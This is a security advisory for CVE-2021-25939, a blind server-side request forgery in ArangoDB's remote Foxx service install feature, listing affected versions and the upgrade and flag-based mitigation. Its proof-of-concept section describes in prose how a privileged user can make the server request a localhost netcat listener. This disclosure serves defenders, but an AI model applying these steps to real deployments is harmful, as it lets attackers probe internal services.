CVE-2021-25939

Overview

In ArangoDB, versions v3.7.0 through v3.9.0-alpha.1 have a feature which allows downloading a Foxx service from a publicly available URL. This feature does not enforce proper filtering of requests performed internally, which can be abused by a highly-privileged attacker to perform blind SSRF and send internal requests to localhost.

Details

ArangoDB is a native multi-model database with flexible data models for documents, graphs, and key-values. Affected versions of ArangoDB are vulnerable to Blind SSRF due to improper filtering of requests performed internally, in the feature which allows downloading Foxx services from a publicly available URL. This can be abused by an authenticated attacker to send internal requests to localhost.
Note: ArangoDB 3.8.x version 3.8.5 and onwards are vulnerable to this issue by default, but can be toggled in the startup options. for further information, see this comment: https://github.com/arangodb/arangodb/pull/15344#issue-1079754008

PoC Details

For demonstration purposes, we will open a netcat listener on the ArangoDB-installed machine, to demonstrate an open local service.
Login as a highly privileged user. Go to Services, Remote, Enter url. Put the Server’s URL with the open netcat port. Set mount point as mnt/hello.
On the netcat listener terminal, we can see that the request was received internally.

Affected Environments

All versions of ArangoDB 3.7; All versions of ArangoDB 3.8 (3.8.5 onwards can be mitigated in startup configuration); ArangoDB 3.9 prior to v3.9.0-beta.1

Prevention

If you are using ArangoDB 3.8 or earlier - Upgrade to ArangoDB 3.8.5 or later, and be sure to toggle off the `--foxx.allow-install-from-remote` flag on startup configuration, otherwise the application will still be vulnerable.
If you are using ArangoDB 3.9 - Upgrade to 3.9.0-beta.1 or later.